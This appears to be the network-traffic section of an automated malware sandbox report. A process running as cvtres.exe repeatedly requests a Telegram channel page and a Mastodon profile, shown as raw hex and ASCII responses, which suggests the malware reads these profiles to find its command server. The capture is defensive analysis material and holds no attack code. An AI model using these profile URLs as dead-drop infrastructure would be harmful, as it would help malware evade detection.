                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  0192.168.2.749765149.154.167.99443C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  2022-08-05 08:49:17 UTC0OUTGET /korstonsales HTTP/1.1
                                                                  Host: t.me
                                                                  2022-08-05 08:49:17 UTC0INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0
                                                                  Date: Fri, 05 Aug 2022 08:49:17 GMT
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Content-Length: 9635
                                                                  Connection: close
                                                                  Set-Cookie: stel_ssid=81a92d177cf1bdddf7_18201360474548186560; expires=Sat, 06 Aug 2022 08:49:17 GMT; path=/; samesite=None; secure; HttpOnly
                                                                  Pragma: no-cache
                                                                  Cache-control: no-store
                                                                  X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                  Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                  Strict-Transport-Security: max-age=35768000
                                                                  2022-08-05 08:49:17 UTC0INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 6b 6f 72 73 74 6f 6e 73 61 6c 65 73 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e
                                                                  Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @korstonsales</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  1192.168.2.749766167.86.107.75443C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  2022-08-05 08:49:17 UTC9OUTGET /@ffoleg94 HTTP/1.1
                                                                  Host: climatejustice.social
                                                                  2022-08-05 08:49:17 UTC10INHTTP/1.1 200 OK
                                                                  Date: Fri, 05 Aug 2022 08:49:17 GMT
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  Server: Mastodon
                                                                  X-Frame-Options: DENY
                                                                  X-Content-Type-Options: nosniff
                                                                  X-XSS-Protection: 0
                                                                  Permissions-Policy: interest-cohort=()
                                                                  Link: <https://climatejustice.social/.well-known/webfinger?resource=acct%3Affoleg94%40climatejustice.social>; rel="lrdd"; type="application/jrd+json", <https://climatejustice.social/users/ffoleg94>; rel="alternate"; type="application/activity+json"
                                                                  Vary: Accept, Accept-Encoding, Origin
                                                                  Cache-Control: max-age=0, public
                                                                  ETag: W/"35467f9a4afaaea4d698d19476026f40"
                                                                  Content-Security-Policy: base-uri 'none'; default-src 'none'; frame-ancestors 'none'; font-src 'self' https://climatejustice.social; img-src 'self' https: data: blob: https://climatejustice.social; style-src 'self' https://climatejustice.social 'nonce-sOykySI0/v+BFinQ5Zv2HQ=='; media-src 'self' https: data: https://climatejustice.social; frame-src 'self' https:; manifest-src 'self' https://climatejustice.social; connect-src 'self' data: blob: https://climatejustice.social https://climatejustice.social wss://climatejustice.social; script-src 'self' https://climatejustice.social; child-src 'self' blob: https://climatejustice.social; worker-src 'self' blob: https://climatejustice.social
                                                                  Set-Cookie: _mastodon_session=IE12lf0Aiww%2FO2SHgNYf6X8ktxvGiUwFuvpakzTKg55PVj3wQxbOx8QbPNu%2BbA1ljKtplQtfpHSjetQM3MX253iMB2kbLm3xNEhgwBeB%2F1eCW8Wg13ePrm5lWBQfL9FAO02eO7J9l3dW3s6HTqeP4cis2esq7DldbRI0JLHXWe51XjtZNzvE6RX%2BUXAkx0ez6ASRzCFL8XG1b53DHaPoYf9LXuHN45UIQQKGgtGvY8K1mMZsTqoEdXlHxIHPmSknkSeuS38vHUAtiNgsrwJoiv1FJ7nyRHySt6rMdHZwhHdc3ptf6PDZ0wBxvwMpVHuFlqdHAXbX%2FUb%2Bmlizb1luBXM%3D--UaPP34RL8MYYb6Tj--nidR%2BdAjAGmnnhmujvS6WQ%3D%3D; path=/; HttpOnly; SameSite=Lax; secure
                                                                  X-Request-Id: 58ae802f-9e2b-4626-b42d-911de7da7729
                                                                  X-Runtime: 0.054172
                                                                  Strict-Transport-Security: max-age=63072000; includeSubDomains
                                                                  X-Cached: MISS
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  2022-08-05 08:49:17 UTC11INData Raw: 36 35 35 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 27 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 75 74 66 2d 38 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 27 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 27 20 72 65 6c 3d 27 69 63 6f 6e 27 20 74 79 70 65 3d 27 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 27 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 27 20 72 65 6c 3d 27 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 27 20 73
                                                                  Data Ascii: 6550<!DOCTYPE html><html lang='en'><head><meta charset='utf-8'><meta content='width=device-width, initial-scale=1' name='viewport'><link href='/favicon.ico' rel='icon' type='image/x-icon'><link href='/apple-touch-icon.png' rel='apple-touch-icon' s
                                                                  2022-08-05 08:49:17 UTC26INData Raw: 22 3e 63 6c 69 6d 61 74 65 6a 75 73 74 69 63 65 2e 67 6c 6f 62 61 6c 3c 2f 61 3e 0d 0a 66 6f 72 20 63 6c 69 6d 61 74 65 6a 75 73 74 69 63 65 20 67 72 6f 75 70 73 0d 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 75 6e 6b 2e 63 6c 69 6d 61 74 65 6a 75 73 74 69 63 65 2e 67 6c 6f 62 61 6c 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 66 75 6e 6b 2e 63 6c 69 6d 61 74 65 6a 75 73 74 69 63 65 2e 67 6c 6f 62 61 6c 3c 2f 61 3e 0d 0a 66 6f 72 20 70 6f 64 63 61 73 74 73 20 61 6e 64 20 6d 75 73 69 63 0d 0a 3c 2f 73 70 61 6e 3e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 27 65 6e 64 6f 72 73 65 6d 65 6e 74 73 2d 77 69 64 67 65 74 20 74 72 65 6e 64 73 2d 77 69 64 67 65 74 27 3e 0a 3c 68 34 20 63 6c 61 73
                                                                  Data Ascii: ">climatejustice.global</a>for climatejustice groups<a href="https://funk.climatejustice.global" target="_blank">funk.climatejustice.global</a>for podcasts and music</span></p></div></div><div class='endorsements-widget trends-widget'><h4 clas


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  10192.168.2.749883149.154.167.99443C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  2022-08-05 08:51:05 UTC188OUTGET /korstonsales HTTP/1.1
                                                                  Host: t.me
                                                                  Cookie: stel_ssid=81a92d177cf1bdddf7_18201360474548186560
                                                                  2022-08-05 08:51:05 UTC188INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0
                                                                  Date: Fri, 05 Aug 2022 08:51:05 GMT
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Content-Length: 9636
                                                                  Connection: close
                                                                  Pragma: no-cache
                                                                  Cache-control: no-store
                                                                  X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                  Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                  Strict-Transport-Security: max-age=35768000
                                                                  2022-08-05 08:51:05 UTC188INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 6b 6f 72 73 74 6f 6e 73 61 6c 65 73 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e
                                                                  Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @korstonsales</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  11192.168.2.749884167.86.107.75443C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  2022-08-05 08:51:05 UTC197OUTGET /@ffoleg94 HTTP/1.1
                                                                  Host: climatejustice.social
                                                                  Cookie: _mastodon_session=G8wdgwz%2FDemSpy0Da1ZLqVdSh5XC%2FhOntkD9%2FioEKONmGFQbKw3ZbiJ4RIMQvyl5QKxN%2FpcDH0nKadQ0yXDwXyz6yqDcLvbVjYrc1VwLIggpvLXohspOLTi9YyRFkDXD1U6%2Fzrzrb4LoA5rAsIFcowDfc23g9dzpYcSLczI6VlHA0lfP8JjHOwarQxEdzM6akhIz0PxsXrVBHQQArBfIyixEHqMzgVy%2FgvPIRcQ2qdVLKMgTPmDwVbQ0%2BqoNguC6M%2F7xjoKMMQknPlrQIslHVR5u8qBY9lIeeNK373jl%2B82kCofXgGW%2BvK4Vwx2GKefGraC9M1B%2Bz7G9H6WpaKFziTw%3D--Ffkg6BiJ3LNw7A7D--YyCOAf66iro8NmL254gNlw%3D%3D
                                                                  2022-08-05 08:51:05 UTC198INHTTP/1.1 200 OK
                                                                  Date: Fri, 05 Aug 2022 08:51:05 GMT
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  Server: Mastodon
                                                                  X-Frame-Options: DENY
                                                                  X-Content-Type-Options: nosniff
                                                                  X-XSS-Protection: 0
                                                                  Permissions-Policy: interest-cohort=()
                                                                  Link: <https://climatejustice.social/.well-known/webfinger?resource=acct%3Affoleg94%40climatejustice.social>; rel="lrdd"; type="application/jrd+json", <https://climatejustice.social/users/ffoleg94>; rel="alternate"; type="application/activity+json"
                                                                  Vary: Accept, Accept-Encoding, Origin
                                                                  Cache-Control: max-age=0, public
                                                                  ETag: W/"bf6f9ea00d1e9729d002200dabef18b5"
                                                                  Content-Security-Policy: base-uri 'none'; default-src 'none'; frame-ancestors 'none'; font-src 'self' https://climatejustice.social; img-src 'self' https: data: blob: https://climatejustice.social; style-src 'self' https://climatejustice.social 'nonce-hliGSyjpUnH3oaKgt9bOUg=='; media-src 'self' https: data: https://climatejustice.social; frame-src 'self' https:; manifest-src 'self' https://climatejustice.social; connect-src 'self' data: blob: https://climatejustice.social https://climatejustice.social wss://climatejustice.social; script-src 'self' https://climatejustice.social; child-src 'self' blob: https://climatejustice.social; worker-src 'self' blob: https://climatejustice.social
                                                                  Set-Cookie: _mastodon_session=F06HonUiNcv5pa3GP8LMm7nHCaKQodwYvwMe%2Be%2FR4qkkEl%2BZYMAoodG2UEkb6Zgxzv4gWsdfuooSoGoAFwH%2FpfPfyem2ws9sRh0fobZw9cTak1%2FJx%2FU8gXjoIV52mDV25d9G49vNv24HzmGy%2Bb2kFQDL4gd9zSDw10wOuhWBjFDg98K4X59aXa4gOJ45X07TfvczeZs1RE1AmMGHtTpE4T3hlu07LRp4qrg4OP1%2FrFDFRzq9F1Gacptxp1gCVFhLiB9K1Z9cC4Cp9VVNJaPR0ZOcMEf3mO7%2FAXWTAxKW9DKcZwFZeo%2F%2BmdtGhpH7I7%2Bkg7ch69hB4A24jelrR%2B3aJ3M%3D--liyMn3gInrF9zig5--LV%2F8jdZL17lO5jGMdMxb2g%3D%3D; path=/; HttpOnly; SameSite=Lax; secure
                                                                  X-Request-Id: 0a2f114a-b261-415d-9fce-3ccdc4f1b854
                                                                  X-Runtime: 0.060840
                                                                  Strict-Transport-Security: max-age=63072000; includeSubDomains
                                                                  X-Cached: MISS
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  2022-08-05 08:51:05 UTC200INData Raw: 36 35 35 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 27 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 75 74 66 2d 38 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 27 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 27 20 72 65 6c 3d 27 69 63 6f 6e 27 20 74 79 70 65 3d 27 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 27 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 27 20 72 65 6c 3d 27 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 27 20 73
                                                                  Data Ascii: 6550<!DOCTYPE html><html lang='en'><head><meta charset='utf-8'><meta content='width=device-width, initial-scale=1' name='viewport'><link href='/favicon.ico' rel='icon' type='image/x-icon'><link href='/apple-touch-icon.png' rel='apple-touch-icon' s
                                                                  2022-08-05 08:51:05 UTC214INData Raw: 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 63 6c 69 6d 61 74 65 6a 75 73 74 69 63 65 2e 67 6c 6f 62 61 6c 3c 2f 61 3e 0d 0a 66 6f 72 20 63 6c 69 6d 61 74 65 6a 75 73 74 69 63 65 20 67 72 6f 75 70 73 0d 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 75 6e 6b 2e 63 6c 69 6d 61 74 65 6a 75 73 74 69 63 65 2e 67 6c 6f 62 61 6c 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 66 75 6e 6b 2e 63 6c 69 6d 61 74 65 6a 75 73 74 69 63 65 2e 67 6c 6f 62 61 6c 3c 2f 61 3e 0d 0a 66 6f 72 20 70 6f 64 63 61 73 74 73 20 61 6e 64 20 6d 75 73 69 63 0d 0a 3c 2f 73 70 61 6e 3e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 27 65 6e 64 6f 72 73 65 6d 65 6e 74 73 2d 77 69 64 67 65 74 20 74 72 65 6e 64 73 2d 77 69 64
                                                                  Data Ascii: target="_blank">climatejustice.global</a>for climatejustice groups<a href="https://funk.climatejustice.global" target="_blank">funk.climatejustice.global</a>for podcasts and music</span></p></div></div><div class='endorsements-widget trends-wid


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  2192.168.2.749768149.154.167.99443C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  2022-08-05 08:49:39 UTC37OUTGET /korstonsales HTTP/1.1
                                                                  Host: t.me
                                                                  Cookie: stel_ssid=81a92d177cf1bdddf7_18201360474548186560
                                                                  2022-08-05 08:49:39 UTC37INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0
                                                                  Date: Fri, 05 Aug 2022 08:49:39 GMT
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Content-Length: 9635
                                                                  Connection: close
                                                                  Pragma: no-cache
                                                                  Cache-control: no-store
                                                                  X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                  Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                  Strict-Transport-Security: max-age=35768000
                                                                  2022-08-05 08:49:39 UTC37INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 6b 6f 72 73 74 6f 6e 73 61 6c 65 73 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e
                                                                  Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @korstonsales</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  3192.168.2.749769167.86.107.75443C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  2022-08-05 08:49:39 UTC47OUTGET /@ffoleg94 HTTP/1.1
                                                                  Host: climatejustice.social
                                                                  Cookie: _mastodon_session=IE12lf0Aiww%2FO2SHgNYf6X8ktxvGiUwFuvpakzTKg55PVj3wQxbOx8QbPNu%2BbA1ljKtplQtfpHSjetQM3MX253iMB2kbLm3xNEhgwBeB%2F1eCW8Wg13ePrm5lWBQfL9FAO02eO7J9l3dW3s6HTqeP4cis2esq7DldbRI0JLHXWe51XjtZNzvE6RX%2BUXAkx0ez6ASRzCFL8XG1b53DHaPoYf9LXuHN45UIQQKGgtGvY8K1mMZsTqoEdXlHxIHPmSknkSeuS38vHUAtiNgsrwJoiv1FJ7nyRHySt6rMdHZwhHdc3ptf6PDZ0wBxvwMpVHuFlqdHAXbX%2FUb%2Bmlizb1luBXM%3D--UaPP34RL8MYYb6Tj--nidR%2BdAjAGmnnhmujvS6WQ%3D%3D
                                                                  2022-08-05 08:49:39 UTC47INHTTP/1.1 200 OK
                                                                  Date: Fri, 05 Aug 2022 08:49:39 GMT
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  Server: Mastodon
                                                                  X-Frame-Options: DENY
                                                                  X-Content-Type-Options: nosniff
                                                                  X-XSS-Protection: 0
                                                                  Permissions-Policy: interest-cohort=()
                                                                  Link: <https://climatejustice.social/.well-known/webfinger?resource=acct%3Affoleg94%40climatejustice.social>; rel="lrdd"; type="application/jrd+json", <https://climatejustice.social/users/ffoleg94>; rel="alternate"; type="application/activity+json"
                                                                  Vary: Accept, Accept-Encoding, Origin
                                                                  Cache-Control: max-age=0, public
                                                                  ETag: W/"f271e218b8b5f4cd48ea9805ee1eaac6"
                                                                  Content-Security-Policy: base-uri 'none'; default-src 'none'; frame-ancestors 'none'; font-src 'self' https://climatejustice.social; img-src 'self' https: data: blob: https://climatejustice.social; style-src 'self' https://climatejustice.social 'nonce-vZ9efujlufLRVX5ML9zhPQ=='; media-src 'self' https: data: https://climatejustice.social; frame-src 'self' https:; manifest-src 'self' https://climatejustice.social; connect-src 'self' data: blob: https://climatejustice.social https://climatejustice.social wss://climatejustice.social; script-src 'self' https://climatejustice.social; child-src 'self' blob: https://climatejustice.social; worker-src 'self' blob: https://climatejustice.social
                                                                  Set-Cookie: _mastodon_session=3rSSEQhY%2BR%2ByBXGg%2FZ7vjc6lT5LBYSBRTm4v10Vjq3ue%2BjwBExu9w58N8ClT%2Bud5pLw%2FhNpc0ZVmhbGFmRwVbdBlbgslSN94eAItWDOu4CGgiK9jhd3mHMacn3wAdie7Kxd1jN1PXBqcxNNL004FuuBE8ZcXHZ9KeIX6GtzzFfvUtnGWm8ZnLLwl53QYxoy96Xw8%2BDQyXocErXsPhQdIg%2FpxcTsHw5r3GkFxULvXrHFqPB166JKLVDREPTkxqTmFOYedLa6uPEB2T4kW8V44pB5aEoVFQGo6vkNDPnAvIGvofiJ%2FGZzi5%2FYGT7rR2OuS9SAL1tKkIZTobYnVx%2Fquwbo%3D--ciXPLxNa31c7%2FJvd--PL1p0wGZ8YwXdexsQfoBoQ%3D%3D; path=/; HttpOnly; SameSite=Lax; secure
                                                                  X-Request-Id: 8fa0a62b-eeaf-451b-a11c-63c7f250595d
                                                                  X-Runtime: 0.059514
                                                                  Strict-Transport-Security: max-age=63072000; includeSubDomains
                                                                  X-Cached: MISS
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  2022-08-05 08:49:39 UTC49INData Raw: 36 35 35 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 27 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 75 74 66 2d 38 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 27 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 27 20 72 65 6c 3d 27 69 63 6f 6e 27 20 74 79 70 65 3d 27 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 27 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 27 20 72 65 6c 3d 27 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 27 20 73
                                                                  Data Ascii: 6550<!DOCTYPE html><html lang='en'><head><meta charset='utf-8'><meta content='width=device-width, initial-scale=1' name='viewport'><link href='/favicon.ico' rel='icon' type='image/x-icon'><link href='/apple-touch-icon.png' rel='apple-touch-icon' s
                                                                  2022-08-05 08:49:39 UTC63INData Raw: 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 63 6c 69 6d 61 74 65 6a 75 73 74 69 63 65 2e 67 6c 6f 62 61 6c 3c 2f 61 3e 0d 0a 66 6f 72 20 63 6c 69 6d 61 74 65 6a 75 73 74 69 63 65 20 67 72 6f 75 70 73 0d 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 75 6e 6b 2e 63 6c 69 6d 61 74 65 6a 75 73 74 69 63 65 2e 67 6c 6f 62 61 6c 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 66 75 6e 6b 2e 63 6c 69 6d 61 74 65 6a 75 73 74 69 63 65 2e 67 6c 6f 62 61 6c 3c 2f 61 3e 0d 0a 66 6f 72 20 70 6f 64 63 61 73 74 73 20 61 6e 64 20 6d 75 73 69 63 0d 0a 3c 2f 73 70 61 6e 3e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 27 65 6e 64 6f 72 73 65 6d 65 6e 74 73 2d 77 69 64 67 65 74 20 74 72 65 6e 64 73 2d 77 69 64 67 65 74 27
                                                                  Data Ascii: et="_blank">climatejustice.global</a>for climatejustice groups<a href="https://funk.climatejustice.global" target="_blank">funk.climatejustice.global</a>for podcasts and music</span></p></div></div><div class='endorsements-widget trends-widget'


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  4192.168.2.749786149.154.167.99443C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  2022-08-05 08:50:00 UTC75OUTGET /korstonsales HTTP/1.1
                                                                  Host: t.me
                                                                  Cookie: stel_ssid=81a92d177cf1bdddf7_18201360474548186560
                                                                  2022-08-05 08:50:00 UTC75INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0
                                                                  Date: Fri, 05 Aug 2022 08:50:00 GMT
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Content-Length: 9634
                                                                  Connection: close
                                                                  Pragma: no-cache
                                                                  Cache-control: no-store
                                                                  X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                  Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                  Strict-Transport-Security: max-age=35768000
                                                                  2022-08-05 08:50:00 UTC75INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 6b 6f 72 73 74 6f 6e 73 61 6c 65 73 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e
                                                                  Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @korstonsales</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  5192.168.2.749787167.86.107.75443C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  2022-08-05 08:50:01 UTC84OUTGET /@ffoleg94 HTTP/1.1
                                                                  Host: climatejustice.social
